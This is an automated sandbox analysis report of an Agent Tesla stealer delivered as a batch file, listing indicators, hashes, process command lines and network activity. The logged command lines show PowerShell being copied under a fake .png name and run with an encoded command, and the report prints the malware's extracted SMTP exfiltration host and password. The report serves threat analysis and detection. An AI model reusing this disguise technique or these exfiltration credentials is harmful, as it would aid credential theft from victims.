File name: New order 500384851183.bat

Full analysis: https://app.any.run/tasks/e6549f51-69a7-4284-b21c-a7ea34ff5125
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: October 11, 2023, 13:33:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags: agenttesla, stealer
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5: 6E3FB71214123B19F8FD692C615C1577
SHA1: C30D85FC8D702705BCF5E6E7D9DC499733EAA03E
SHA256: AAB4FC1AFB94B7A35CAD44AA926BE0B28EEB52EFC4746A49632F9F4427D96416
SSDEEP: 24576:DsCatJd8cOo5xYunVTxt3T7B4FvxjenbLz2D8qw:F4VHH0ebXL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 1284)
      • cmd.exe (PID: 2148)
    • Application was dropped or rewritten from another process

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Steals credentials from Web Browsers

      • Qicoiyo.png (PID: 1936)
    • Actions looks like stealing of personal data

      • Qicoiyo.png (PID: 1936)
    • AGENTTESLA has been detected (YARA)

      • Qicoiyo.png (PID: 1936)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • xcopy.exe (PID: 2464)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 1296)
      • Qicoiyo.png (PID: 2228)
      • cmd.exe (PID: 992)
      • cmd.exe (PID: 1564)
    • Application launched itself

      • cmd.exe (PID: 1296)
      • cmd.exe (PID: 1284)
      • cmd.exe (PID: 1564)
      • cmd.exe (PID: 2148)
      • cmd.exe (PID: 992)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1284)
      • cmd.exe (PID: 1296)
      • cmd.exe (PID: 992)
      • Qicoiyo.png (PID: 2228)
      • cmd.exe (PID: 1564)
      • cmd.exe (PID: 2148)
    • Starts application with an unusual extension

      • cmd.exe (PID: 1284)
      • cmd.exe (PID: 2148)
    • Checks Windows Trust Settings

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Reads the Internet Settings

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Reads security settings of Internet Explorer

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Connects to SMTP port

      • Qicoiyo.png (PID: 1936)
    • Accesses Microsoft Outlook profiles

      • Qicoiyo.png (PID: 1936)
  • INFO

    • Create files in a temporary directory

      • xcopy.exe (PID: 2780)
      • xcopy.exe (PID: 2464)
      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Drops the executable file immediately after the start

      • xcopy.exe (PID: 2464)
    • Checks supported languages

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Reads the computer name

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Reads the machine GUID from the registry

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • The executable file from the user directory is run by the CMD process

      • Qicoiyo.png (PID: 2228)
      • Qicoiyo.png (PID: 1936)
    • Reads Environment values

      • Qicoiyo.png (PID: 1936)
    • Creates files or folders in the user directory

      • Qicoiyo.png (PID: 1936)

AgentTesla configuration (extracted from PID 1936, Qicoiyo.png)

Protocol: smtp
Host: mail.asiaparadisehotel.com
Port: 587
Password: ^b2ycDldex$@
Total processes: 56
Monitored processes: 19
Malicious processes: 7
Suspicious processes: 0


Process information

PID 1296: cmd.exe (parent process: explorer.exe)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\New order 500384851183.bat" "
Path: C:\Windows\System32\cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Loaded images (all under c:\windows\system32\): cmd.exe, kernel32.dll, ntdll.dll, kernelbase.dll, msvcrt.dll, winbrand.dll, user32.dll, gdi32.dll, lpk.dll, usp10.dll

PID 2268: cmd.exe (parent process: cmd.exe)
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
Path: C:\Windows\System32\cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Loaded images (all under c:\windows\system32\): cmd.exe, ntdll.dll, kernel32.dll, kernelbase.dll, msvcrt.dll, winbrand.dll, usp10.dll, lpk.dll, user32.dll, gdi32.dll

PID 2464: xcopy.exe (parent process: cmd.exe)
Command line: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\admin\AppData\Local\Temp\Qicoiyo.png
Path: C:\Windows\System32\xcopy.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Extended Copy Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Loaded images (all under c:\windows\system32\): xcopy.exe, ntdll.dll, kernel32.dll, kernelbase.dll, msvcrt.dll, advapi32.dll, sechost.dll, rpcrt4.dll, user32.dll, ulib.dll

PID 1284: cmd.exe (parent process: cmd.exe)
Command line: C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\New order 500384851183.bat"
Path: C:\Windows\System32\cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows Command Processor; Exit code: 4294967295; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Loaded images (all under c:\windows\system32\): ntdll.dll, cmd.exe, kernel32.dll, kernelbase.dll, msvcrt.dll, winbrand.dll, user32.dll, gdi32.dll, lpk.dll, usp10.dll

PID 2564: cmd.exe (parent process: cmd.exe)
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
Path: C:\Windows\System32\cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Loaded images (all under c:\windows\system32\): cmd.exe, ntdll.dll, kernelbase.dll, kernel32.dll, winbrand.dll, gdi32.dll, lpk.dll, user32.dll, usp10.dll, msctf.dll

PID 2524: xcopy.exe (parent process: cmd.exe)
Command line: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\admin\AppData\Local\Temp\Qicoiyo.png
Path: C:\Windows\System32\xcopy.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Extended Copy Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Loaded images (all under c:\windows\system32\): xcopy.exe, kernel32.dll, kernelbase.dll, ntdll.dll, msvcrt.dll, advapi32.dll, sechost.dll, rpcrt4.dll, ulib.dll, user32.dll

PID 2548: cmd.exe (parent process: cmd.exe)
Command line: C:\Windows\system32\cmd.exe /S /D /c" echo F "
Path: C:\Windows\System32\cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Loaded images (all under c:\windows\system32\): ntdll.dll, cmd.exe, kernel32.dll, kernelbase.dll, msvcrt.dll, winbrand.dll, user32.dll, lpk.dll, usp10.dll, gdi32.dll

PID 2780: xcopy.exe (parent process: cmd.exe)
Command line: xcopy /d /q /y /h /i "C:\Users\admin\AppData\Local\Temp\New order 500384851183.bat" C:\Users\admin\AppData\Local\Temp\Qicoiyo.png.bat
Path: C:\Windows\System32\xcopy.exe
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Extended Copy Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Loaded images (all under c:\windows\system32\): ntdll.dll, kernel32.dll, kernelbase.dll, xcopy.exe, advapi32.dll, sechost.dll, rpcrt4.dll, ulib.dll, msvcrt.dll, user32.dll

PID 2228: Qicoiyo.png, a renamed copy of powershell.exe (parent process: cmd.exe)
Command line: C:\Users\admin\AppData\Local\Temp\Qicoiyo.png -win 1 -enc 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
Path: C:\Users\admin\AppData\Local\Temp\Qicoiyo.png
User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Exit code: 4294967295; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Loaded images: c:\users\admin\appdata\local\temp\qicoiyo.png, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\syswow64\kernel32.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\user32.dll, c:\windows\system32\wow64cpu.dll, c:\windows\system32\wow64win.dll, c:\windows\syswow64\kernelbase.dll

PID 992: cmd.exe (parent process: Qicoiyo.png)
Command line: "C:\Windows\SysWOW64\cmd.exe" /k START "" "C:\Users\admin\AppData\Local\Temp\Qicoiyo.png.bat" & EXIT
Path: C:\Windows\SysWOW64\cmd.exe
User: admin; Company: Microsoft Corporation; Integrity level: HIGH; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Loaded images: c:\windows\syswow64\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\system32\user32.dll, c:\windows\syswow64\kernelbase.dll
Total events: 2 114
Read events: 2 098
Write events: 16
Delete events: 0

Modification events

Registry key for all entries below: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

PID 2228 (Qicoiyo.png): write ProxyBypass = 1
PID 2228 (Qicoiyo.png): write IntranetName = 1
PID 2228 (Qicoiyo.png): write UNCAsIntranet = 1
PID 2228 (Qicoiyo.png): write AutoDetect = 0
PID 1936 (Qicoiyo.png): write ProxyBypass = 1
PID 1936 (Qicoiyo.png): write IntranetName = 1
PID 1936 (Qicoiyo.png): write UNCAsIntranet = 1
PID 1936 (Qicoiyo.png): write AutoDetect = 0
Executable files: 1
Suspicious files: 6
Text files: 2
Unknown types: 0

Dropped files

PID 1936 (Qicoiyo.png): C:\Users\admin\AppData\Local\Temp\araibzgg.cik.psm1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B; SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

PID 1936 (Qicoiyo.png): C:\Users\admin\AppData\Local\Temp\w43kav5g.him.ps1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B; SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

PID 2228 (Qicoiyo.png): C:\Users\admin\AppData\Local\Temp\2zrjmntx.bse.ps1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B; SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

PID 2228 (Qicoiyo.png): C:\Users\admin\AppData\Local\Temp\n3dafaxc.gf1.psm1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B; SHA256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

PID 2228 (Qicoiyo.png): C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (binary)
MD5: 446DD1CF97EABA21CF14D03AEBC79F27; SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF

PID 2464 (xcopy.exe): C:\Users\admin\AppData\Local\Temp\Qicoiyo.png (executable)
MD5: EB32C070E658937AA9FA9F3AE629B2B8; SHA256: 70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE

PID 1936 (Qicoiyo.png): C:\Users\admin\AppData\Roaming\Microsoft\Qicoiyo.bat (text)
MD5: 6E3FB71214123B19F8FD692C615C1577; SHA256: AAB4FC1AFB94B7A35CAD44AA926BE0B28EEB52EFC4746A49632F9F4427D96416

PID 1936 (Qicoiyo.png): C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache (binary)
MD5: 15FC1C107EC34300ED4A4DD76992A0B0; SHA256: 5445E9C6C24E72BF573A85CEFC3DFF563A5C7E52FC72C851C52E7A9ACBA5CC7E

PID 2780 (xcopy.exe): C:\Users\admin\AppData\Local\Temp\Qicoiyo.png.bat (text)
MD5: 6E3FB71214123B19F8FD692C615C1577; SHA256: AAB4FC1AFB94B7A35CAD44AA926BE0B28EEB52EFC4746A49632F9F4427D96416
HTTP(S) requests: 0
TCP/UDP connections: 7
DNS requests: 2
Threats: 0

HTTP requests

No HTTP requests

Connections

PID 324 (svchost.exe): 224.0.0.252:5355; reputation: unknown
PID 4 (System): 192.168.100.255:138; reputation: whitelisted
PID 4 (System): 192.168.100.255:137; reputation: whitelisted
PID 1956 (svchost.exe): 239.255.255.250:1900; reputation: whitelisted
PID 1936 (Qicoiyo.png): 64.185.227.156:443; domain: api.ipify.org; ASN: WEBNX; CN: US; reputation: unknown
PID 1936 (Qicoiyo.png): 112.213.92.100:587; domain: mail.asiaparadisehotel.com; ASN: SUPERDATA; CN: VN; reputation: unknown

DNS requests

api.ipify.org: 64.185.227.156, 104.237.62.212, 173.231.16.77; reputation: shared
mail.asiaparadisehotel.com: 112.213.92.100; reputation: malicious

Threats

PID 324 (svchost.exe), Misc activity: ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
PID 1936 (Qicoiyo.png), Misc activity: ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
1 ETPRO signature available at the full report